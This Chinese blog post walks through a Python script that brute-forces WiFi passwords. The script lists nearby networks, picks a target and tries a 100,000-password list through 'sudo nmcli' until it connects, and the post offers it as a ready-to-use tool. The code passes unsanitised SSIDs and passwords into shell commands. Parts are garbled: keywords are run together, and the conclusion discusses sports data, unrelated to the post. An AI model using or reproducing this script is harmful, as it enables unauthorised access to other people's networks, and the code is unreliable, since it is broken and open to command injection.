用Python脚本将wifi密码破解(3步破解WiFi密码)

路由器 用Python脚本将wifi密码破解(3步破解WiFi密码)已关闭评论120字数 3257阅读10分51秒

很多用户都很好奇那些网络大神是怎么把无线路由器的wifi密码破解的,其实破解WiFi密码的难度仅限于路由器的主人把密码设置得多复杂而已,如果是用比较常用的弱密码口令,那么就很容易将WiFi破解出来。

用Python脚本将wifi密码破解(3步破解WiFi密码)

如何破解WiFi密码?

本文,将会通过Python教大家如何实现,这里纯粹是为了学习用途。

1. WiFi列表

首先,我们需要获取附近的WiFi列表。

下面,就来写一个函数来获取附近的WiFi列表,函数命名为display_targets:

def display_targets(networks, security_type):
    print("Select a target: \n")
    
    rows, columns = os.popen('stty size', 'r').read().split()
    for i in range(len(networks)):
        width = len(str(str(i+1)+". "+networks[i]+security_type[i]))+2
        spacer = " "
        
        if (int(columns) >= 100):
            calc = int((int(columns)-int(width))*0.75)
        else:
                calc = int(columns)-int(width)
        
        for index in range(calc):
            spacer += "."
            if index == (calc-1):
                spacer += " "
            
        print(str(i+1)+". "+networks[i]+spacer+security_type[i])

这里,我们会用到ssid工具包,用来获取附近的WiFi列表,存入到参数networks。

用Python脚本将wifi密码破解(3步破解WiFi密码)

 

2. 选择WiFi

获取WiFi列表之后,下一步要做的就是选择我们想要连接的WiFi信号。

def prompt_for_target_choice(max):
    whileTrue:
        try:
            selected = int(input("\nEnter number of target: "))
            if(selected >= 1and selected <= max):
                return selected - 1
        except Exception as e:
            ignore = e

        print("Invalid choice: Please pick a number between 1 and " + str(max))

这里很简单,就是一些通用的Python功能。

 

3. 暴力破解

目前已经获取并且选择了想要连接的WiFi,那么如何获取到它的密码呢?

这里要用到一种比较常见的方式:暴力破解

这里,要用到Github上一个项目,它收集了最常用的10万个WiFi密码。我们就用着10万个密码暴力解锁WiFi即可。

def brute_force(selected_network, passwords, args):
    for password in passwords:
        # necessary due to NetworkManager restart after unsuccessful attempt at login
        password = password.strip()

        # when when obtain password from url we need the decode utf-8 however we doesnt when reading from file
        if isinstance(password, str):
            decoded_line = password
        else:
            decoded_line = password.decode("utf-8")
            
        if args.verbose isTrue:
            print(bcolors.HEADER+"** TESTING **: with password '" +
                decoded_line+"'"+bcolors.ENDC)

        if (len(decoded_line) >= 8):
            time.sleep(3)

            creds = os.popen("sudo nmcli dev wifi connect " +
                selected_network+" password "+decoded_line).read()
                
            # print(creds)

            if ("Error:"in creds.strip()):
                if args.verbose isTrue:
                    print(bcolors.FAIL+"** TESTING **: password '" +
                        decoded_line+"' failed."+bcolors.ENDC)
            else:
                sys.exit(bcolors.OKGREEN+"** KEY FOUND! **: password '" +
                    decoded_line+"' succeeded."+bcolors.ENDC)
        else:
            if args.verbose isTrue:
                print(bcolors.OKCYAN+"** TESTING **: password '" +
                    decoded_line+"' too short, passing."+bcolors.ENDC)

    print(bcolors.FAIL+"** RESULTS **: All passwords failed :("+bcolors.ENDC)

核心功能3个函数就完成了,只用了60行Python代码!

下面就把它们串联在一起:

def main():
    require_root()
    args = argument_parser()

    # The user chose to supplied their own url
    if args.url isnotNone:
        passwords = fetch_password_from_url(args.url)
    # user elect to read passwords form a file
    elif args.file isnotNone:
        file = open(args.file, "r")
        passwords = file.readlines()
        ifnot passwords:
            print("Password file cannot be empty!")
            exit(0)
        file.close()
    else:
        # fallback to the default list as the user didnt supplied a password list
        default_url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt"
        passwords = fetch_password_from_url(default_url)

    # grabbing the list of the network ssids
    func_call = start(1)
    networks = func_call[0]
    security_type = func_call[1]
    
    ifnot networks:
        print("No networks found!")
        sys.exit(-1)

    display_targets(networks, security_type)
    max = len(networks)
    pick = prompt_for_target_choice(max)
    target = networks[pick]
    
    print("\nWifi-bf is running. If you would like to see passwords being tested in realtime, enable the [--verbose] flag at start.")

    brute_force(target, passwords, args)

不同的颜色代表不同不同的结果:

  • 红色:测试失败
  • 绿色:破解成功
  • 紫色:测试中

现在,是不是发现这个看上去很复杂的事情变得简单许多?

结语:

运动中充满了各种不同维度的数据,上述只是列举出一些我个人比较感兴趣的维度进行了分析与可视化。

希望,能够对你有所启示,能够发掘更有价值、有趣的信息,在学习和乐趣中得到最佳的实践。

继续阅读
路由器设置

进不了小米路由器管理后台界面怎么办?

有些用户在使用小米路由器的时候,可能回遇到过无线进入路由器管理后台界面,这个原因有几个,第一个是没有将小米路由器管理后台地址输入正确,第二个是打开miwifi.com访问的是小米路由器的官网,不是管理...
路由器设置

Wi-Fi 6的160Hz是什么?

Wi-Fi 6已是当下最火的话题,无论新出的路由器或是终端产品均已支持Wi-Fi6。但在选购时,消费者会发现,有的产品支持160MHz,有的不支持。160MHz频段对于Wi-Fi 6不是必选,只是可选...
路由器设置

TP-Link无线路由器管理员密码是什么?

几年之前的旧版普联路由器,默认的管理员密码是:admin。目前市面上的普联路由器,可以称之为新版普联路由器,是没有默认管理员密码的。新版普联(TP-Link)路由器的管理员密码,是第一次设置上网时,用...
路由器设置

路由器设置宽带拨号无法上网 怎么办?

路由器设置宽带拨号上网,但是无法上网,手机可以连接wifi,但是没有网络,微信、抖音这些都无法登录,这是怎么回事呢?路由器宽带拨号路由器WAN口设置宽带拨号上网后,管理界面>>首页中显示(...
路由器设置

中兴无线路由器官网是多少?

问:中兴无线路由器官网是多少?家里的无线路由器是中兴的,但是没有查到中兴无线路由器的官网。中兴路由器答:中兴路由器没有官网,只有中兴商城(www.ztemall.com),而中兴路由器的登录官网地址是...